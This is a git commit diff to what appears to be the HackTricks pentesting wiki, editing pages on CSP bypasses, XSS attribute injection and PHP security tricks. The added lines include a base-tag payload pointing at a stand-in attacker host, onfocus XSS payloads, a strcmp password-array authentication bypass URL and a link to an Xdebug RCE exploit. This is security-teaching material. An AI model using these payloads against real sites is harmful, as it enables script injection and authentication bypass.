GitBook: [#3070] No subject

This commit is contained in:
CPol 2022-03-21 17:05:35 +00:00 committed by gitbook-bot
parent a7086a6c4a
commit 5346a4c5e6
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
8 changed files with 31 additions and 16 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.7 MiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 1.7 MiB

After

Width:  |  Height:  |  Size: 34 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 34 KiB

After

Width:  |  Height:  |  Size: 111 KiB

View file

@ -194,6 +194,17 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.
[iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md) [iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md)
{% endcontent-ref %} {% endcontent-ref %}
### missing **base-uri**
If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](dangling-markup-html-scriptless-injection.md).
Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
****If the vulnerable page is loaded with **httpS**, make use a httpS url in the base.
```html
<base href="https://www.attacker.com/">
```
### AngularJS events ### AngularJS events
Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this: Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this:

View file

@ -202,8 +202,9 @@ If you just think that **it's impossible to create an HTML tag with an attribute
If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.\ If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.\
If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_): If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_):
```javascript ```bash
" autofocus onfocus=alert(document.domain) x=" " autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
``` ```
#### Style events #### Style events

View file

@ -55,7 +55,7 @@ var_dump(in_array(0, $values, true));
//False //False
``` ```
### **strcmp()/**strcasecmp() ### strcmp()/strcasecmp()
If this function is used for **any authentication check** (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password (`https://example.com/login.php/?username=admin&password[]=`) and bypass this check: If this function is used for **any authentication check** (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password (`https://example.com/login.php/?username=admin&password[]=`) and bypass this check:
@ -133,17 +133,13 @@ $obfs += ""; //int 7
## More tricks ## More tricks
**register\_globals**: En PHP < 4.1.1 o si se ha configurado mal puede ser que las register\_globals estén activas (o se esté imitando su comportamiento). Esto implica que en variables globales como $\_GET si estas poseen un valor por ejemplo $\_GET\["param"]="1234", puedes acceder a este mediante $param. Por lo tanto, enviando parámetros de Get o Post se pueden sobreescribir variables que se usan dentro del código. * **register\_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register\_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code.&#x20;
* The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\
This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2).
* When you have the **usernames** of the users of the machine. Check the address: **/\~\<USERNAME>** to see if the php directories are activated.
* [**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)
Las **variables de sesión** (asociadas al **PHPSESSION**) de un dominio se guardan en el mismo sitio, por lo tanto si dentro de un dominio se usan distintas cookies en distintos paths se puede hacer que un path acceda a la cookie del otro accediendo a dicho path con la cookie del otro. De esta forma si los dos paths acceden a una variable con el mismo nombre puedes hacer que el valor de dicha variable en el path1 se aplique al path2. Y entonces el path2 tomará como válidas las variables del path1 (al ponerle a la cookie el nombre que le corresponde en el path2). ### password\_hash/password\_verify
Dos usuarios generados a la vez pueden tener la misma cookie (si la cookie depende del tiempo).
When you have the **usernames** of teh users of the machine. Check the address: **/\~\<USERNAME>** to see if the php directories are activated.
****[**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)****
### **password\_hash/**password\_verify
This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\ This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\
The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD\_DEFAULT is frequently the same as PASSWORD\_BCRYPT.** And currently, **PASSWORD\_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used: The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD\_DEFAULT is frequently the same as PASSWORD\_BCRYPT.** And currently, **PASSWORD\_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used:
@ -156,6 +152,13 @@ $cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("
True True
``` ```
### HTTP headers bypass abusing PHP errors
If a **PHP page is printing errors and echoing back some input provided by the user**, the user can make the PHP server print back some **content long enough** so when it tries to **add the headers** into the response the server will throw and error.\
In the following scenario the **attacker made the server throw some big errors**, and as you can see in the screen when php tried to **modify the header information, it couldn't** (so for example the CSP header wasn't sent to the user):
![](<../../../.gitbook/assets/image (465).png>)
## Code execution ## Code execution
**system("ls");**\ **system("ls");**\
@ -270,7 +273,7 @@ echo "$x ${Da}"; //Da Drums
## Xdebug unauthenticated RCE ## Xdebug unauthenticated RCE
If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)&#x20; If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)
## Execute PHP without letters ## Execute PHP without letters

View file

@ -55,7 +55,7 @@ To connect with the bus pirate you can follow the docs:
In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27: In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
![](<../../.gitbook/assets/image (465) (2).png>) ![](<../../.gitbook/assets/image (465) (2) (1).png>)
To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\ To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication): In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):

View file

@ -14,7 +14,7 @@ In settings (the second tab button) you can select the **SDR device** or **selec
In the GUI behaviour it's recommended to enable a few things if your PC support it: In the GUI behaviour it's recommended to enable a few things if your PC support it:
![](<../../.gitbook/assets/image (465).png>) ![](<../../.gitbook/assets/image (465) (2).png>)
{% hint style="info" %} {% hint style="info" %}
If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate. If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.